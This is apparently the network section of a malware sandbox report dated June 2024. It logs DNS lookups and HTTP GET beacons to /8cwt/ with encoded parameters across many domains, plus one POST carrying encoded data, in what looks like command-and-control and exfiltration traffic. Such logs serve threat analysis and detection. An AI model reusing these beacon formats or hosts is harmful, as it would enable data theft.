        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=wJjsrv+xTFW5EezvLu5DoT5e4On1D8g+dr15EOXITWTD1anv0RLrfGS01TvW8pCuGmfcOvvelUpztksk4WpfZfFxijTtARXG8NIL7Taa8Kq3eoSsUv86NcY=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.k4ryd.usAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=15acxp6jrOd/buvS9YLoVCwQt/eIj0wV8tP3YL3PMsIjyFVitYjgFC8LDxGQh6T0kTJLIrMUzadAXsDAGdfiNfgPYx4xbqKJILHq2u+5CghFrM1CdZcxiKw=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.accentbathrooms.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=l+yNdBmIbZk94DyhKMCQgPu5et7F5Fjr+MUK0mOzdhwjPjmD5w+n15/KVowCPgtS4Y9yjKxUIxHTxuQuQfpR6KughRwQexCRaaEyjIZ4vPoy+iMgbgX/vtU=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.shun-yamagata.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=2L0w4dAlDepmBmTjVKMMeU7pTlJruWimQKtzQaHnPyexis6Apolau4+PRU3ZMaY44LgKCLzXfDRRDI6NjDrIa0AFdv/y2wt/s903kXPouMaZATl0JyX7k5A=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.brongal.byAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=8fvO6riwiNdGIieTsu/tMoq1+6O9galEvK05+Szv2OjuFl7+WHHAVTXMU1G96mraFYLMRcvsh+SJXHUnSCy+mSK3fOJTqBcOyoKopFv0eDv6jorQ0HypEvo=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.jdps.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=/eyPcvofDN2lSaRtaOy598Um2jV4WFkB8F+tj/gurFaBNg3fGC8Bq8tEkH7S9Bted1WP+/9Tvc8BBtdeQx/29+uX5MeVdplxqUx1gZhmZuS5o8pYgM2a/wg=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.belgravevilla.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=hBVPMRA8AXkfi8sX3ZU3xUlYATFWOWKaW/82pjFjYWbiYeLOxLODNY5T0HEKtdu9psozILhwOJRChZ+L+nmp0Ast2pFtgkKWXgnlG+28tA4JhCFPXI/mZUw=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.insist.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=ta/RVvqxwt03TPXWzdfJPt4x66UfuVsjNv5QpTaL8gP24YNLrE30I2eSxM0VtxXCv+eA5B8kQfuz0YxEkZl7phijUbluJOwzHO73Kb9kDKOg+aMKAT0Adgs=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.nurenose.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=JIyO8Gc0ZaCUBC4gwloHiifCYtv01LSxCuL3sMDgSuZIErE9iBbFukGcMyuYgIJjP33nSDseYz7bP5VCvKNEdyHwbE4qu9h+y1aodMHm9WSOLrl68ngvcME=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.cd14j.usAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=iQ4bGvtt1bUOdIMmx0FoKxyGgfNtaKfegGtnnpaIA0bWJs9Q4689zouPx5Y4+HL6T4TvrzgawqpIlVOGUgGREoTlcD3Zw3RnhErLbn743FaHB2O7toC+0mA=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.respirelavie.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=KAkr0JsC36DOGBdb86MaWw8oa5TA2XZrFg5SI4PSAqjqBay0+Mt9GFSkKu0kcsR0pRjPiVoCFffv9kAFnu4p94pvlKRDsoyD63jLrTdFBvrOG4BRdTojXfc=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.airportsurvery.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=SSpGlvD+1syJM+fS7Z8C1Cd2ZLeBmOr+68qPZxMelqgcCM6DsfmVmmLjkXM2/P+9S0q4oxoduwfupYzMqMwdcdYcBeP38sFbk5TUrAJPEOGdI/gD7BvPJp4=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.innovtech.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=wJjsrv+xTFW5EezvLu5DoT5e4On1D8g+dr15EOXITWTD1anv0RLrfGS01TvW8pCuGmfcOvvelUpztksk4WpfZfFxijTtARXG8NIL7Taa8Kq3eoSsUv86NcY=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.k4ryd.usAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=15acxp6jrOd/buvS9YLoVCwQt/eIj0wV8tP3YL3PMsIjyFVitYjgFC8LDxGQh6T0kTJLIrMUzadAXsDAGdfiNfgPYx4xbqKJILHq2u+5CghFrM1CdZcxiKw=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.accentbathrooms.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=l+yNdBmIbZk94DyhKMCQgPu5et7F5Fjr+MUK0mOzdhwjPjmD5w+n15/KVowCPgtS4Y9yjKxUIxHTxuQuQfpR6KughRwQexCRaaEyjIZ4vPoy+iMgbgX/vtU=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.shun-yamagata.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=2L0w4dAlDepmBmTjVKMMeU7pTlJruWimQKtzQaHnPyexis6Apolau4+PRU3ZMaY44LgKCLzXfDRRDI6NjDrIa0AFdv/y2wt/s903kXPouMaZATl0JyX7k5A=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.brongal.byAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: global trafficDNS traffic detected: DNS query: www.respirelavie.net
        Source: global trafficDNS traffic detected: DNS query: www.airportsurvery.com
        Source: global trafficDNS traffic detected: DNS query: www.innovtech.life
        Source: global trafficDNS traffic detected: DNS query: www.k4ryd.us
        Source: global trafficDNS traffic detected: DNS query: www.auetravel.kz
        Source: global trafficDNS traffic detected: DNS query: www.accentbathrooms.com
        Source: global trafficDNS traffic detected: DNS query: www.shun-yamagata.com
        Source: global trafficDNS traffic detected: DNS query: www.donumul.com
        Source: global trafficDNS traffic detected: DNS query: www.brongal.by
        Source: global trafficDNS traffic detected: DNS query: www.jdps.org
        Source: global trafficDNS traffic detected: DNS query: www.belgravevilla.com
        Source: global trafficDNS traffic detected: DNS query: www.insist.site
        Source: global trafficDNS traffic detected: DNS query: www.runonbattery.com
        Source: global trafficDNS traffic detected: DNS query: www.nemeanshop.com
        Source: global trafficDNS traffic detected: DNS query: www.nurenose.com
        Source: global trafficDNS traffic detected: DNS query: www.cd14j.us
        Source: unknownHTTP traffic detected: POST /8cwt/ HTTP/1.1Host: www.airportsurvery.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.airportsurvery.comReferer: http://www.airportsurvery.com/8cwt/Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 203User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31Data Raw: 32 34 65 6c 75 58 3d 48 43 4d 4c 33 38 55 55 72 50 61 39 47 69 6b 73 79 76 39 4b 43 41 51 54 66 61 54 58 34 57 4a 4b 4d 42 68 64 47 4c 57 7a 48 37 54 61 46 4c 32 4b 33 38 55 4b 4b 45 33 53 45 37 49 44 58 76 31 79 6d 44 50 57 69 68 68 77 4b 2f 53 47 75 6d 63 67 6e 50 63 65 68 4a 56 71 6a 4b 4a 66 6c 76 43 64 36 6b 53 7a 31 78 30 35 49 59 76 53 62 4a 6c 33 4c 6b 42 33 5a 65 78 34 68 6a 2f 75 61 46 65 76 5a 36 36 52 47 77 58 58 4e 39 4f 53 42 56 62 6e 50 33 31 6e 47 73 72 63 42 67 66 37 6a 2f 57 46 59 2f 77 62 77 4c 5a 30 68 36 4f 37 30 58 59 69 64 57 4f 71 73 51 56 47 4e 78 4d 6b 6a 4e 56 44 46 41 3d 3d Data Ascii: 24eluX=HCML38UUrPa9Giksyv9KCAQTfaTX4WJKMBhdGLWzH7TaFL2K38UKKE3SE7IDXv1ymDPWihhwK/SGumcgnPcehJVqjKJflvCd6kSz1x05IYvSbJl3LkB3Zex4hj/uaFevZ66RGwXXN9OSBVbnP31nGsrcBgf7j/WFY/wbwLZ0h6O70XYidWOqsQVGNxMkjNVDFA==
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Jun 2024 12:15:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Jun 2024 12:15:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Jun 2024 12:15:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Jun 2024 12:15:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.14.2Date: Tue, 04 Jun 2024 12:17:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 90 31 0e c2 30 0c 45 77 24 ee 60 ba a7 a1 d0 31 64 41 20 31 30 71 82 a4 36 4d a4 34 41 21 12 f4 f6 24 50 24 c4 cc c8 e8 ef e7 67 cb c2 a4 c1 c9 f9 4c 18 52 28 45 b2 c9 91 6c 97 6b d8 87 a8 2d 22 79 c1 5f a1 e0 4f 24 a3 3a e0 08 ba ef 82 0b 71 53 dd 8c 4d 54 15 45 47 3e 51 94 c2 34 df 86 9c 08 3e b5 cb ae 0c 4d 95 ef ad bf f3 a6 6e da 7a f5 89 f0 b2 a4 48 f9 fb c0 05 63 a0 e0 a2 10 ad ef 21 05 40 7b 55 da 11 1c 4f 87 1d 28 8f b0 35 31 0c 04 e7 68 c9 a3 1b 81 62 0c 31 4f f4 04 8c 15 d7 5f f1 cb 5f 3c 00 d2 96 ee 17 3b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: bc10Ew$`1dA 10q6M4A!$P$gLR(Elk-"y_O$:qSMTEG>Q4>MnzHc!@{UO(51hb1O__<;0
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.14.2Date: Tue, 04 Jun 2024 12:17:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 90 31 0e c2 30 0c 45 77 24 ee 60 ba a7 a1 d0 31 64 41 20 31 30 71 82 a4 36 4d a4 34 41 21 12 f4 f6 24 50 24 c4 cc c8 e8 ef e7 67 cb c2 a4 c1 c9 f9 4c 18 52 28 45 b2 c9 91 6c 97 6b d8 87 a8 2d 22 79 c1 5f a1 e0 4f 24 a3 3a e0 08 ba ef 82 0b 71 53 dd 8c 4d 54 15 45 47 3e 51 94 c2 34 df 86 9c 08 3e b5 cb ae 0c 4d 95 ef ad bf f3 a6 6e da 7a f5 89 f0 b2 a4 48 f9 fb c0 05 63 a0 e0 a2 10 ad ef 21 05 40 7b 55 da 11 1c 4f 87 1d 28 8f b0 35 31 0c 04 e7 68 c9 a3 1b 81 62 0c 31 4f f4 04 8c 15 d7 5f f1 cb 5f 3c 00 d2 96 ee 17 3b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: bc10Ew$`1dA 10q6M4A!$P$gLR(Elk-"y_O$:qSMTEG>Q4>MnzHc!@{UO(51hb1O__<;0
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.14.2Date: Tue, 04 Jun 2024 12:17:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 90 31 0e c2 30 0c 45 77 24 ee 60 ba a7 a1 d0 31 64 41 20 31 30 71 82 a4 36 4d a4 34 41 21 12 f4 f6 24 50 24 c4 cc c8 e8 ef e7 67 cb c2 a4 c1 c9 f9 4c 18 52 28 45 b2 c9 91 6c 97 6b d8 87 a8 2d 22 79 c1 5f a1 e0 4f 24 a3 3a e0 08 ba ef 82 0b 71 53 dd 8c 4d 54 15 45 47 3e 51 94 c2 34 df 86 9c 08 3e b5 cb ae 0c 4d 95 ef ad bf f3 a6 6e da 7a f5 89 f0 b2 a4 48 f9 fb c0 05 63 a0 e0 a2 10 ad ef 21 05 40 7b 55 da 11 1c 4f 87 1d 28 8f b0 35 31 0c 04 e7 68 c9 a3 1b 81 62 0c 31 4f f4 04 8c 15 d7 5f f1 cb 5f 3c 00 d2 96 ee 17 3b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: bc10Ew$`1dA 10q6M4A!$P$gLR(Elk-"y_O$:qSMTEG>Q4>MnzHc!@{UO(51hb1O__<;0
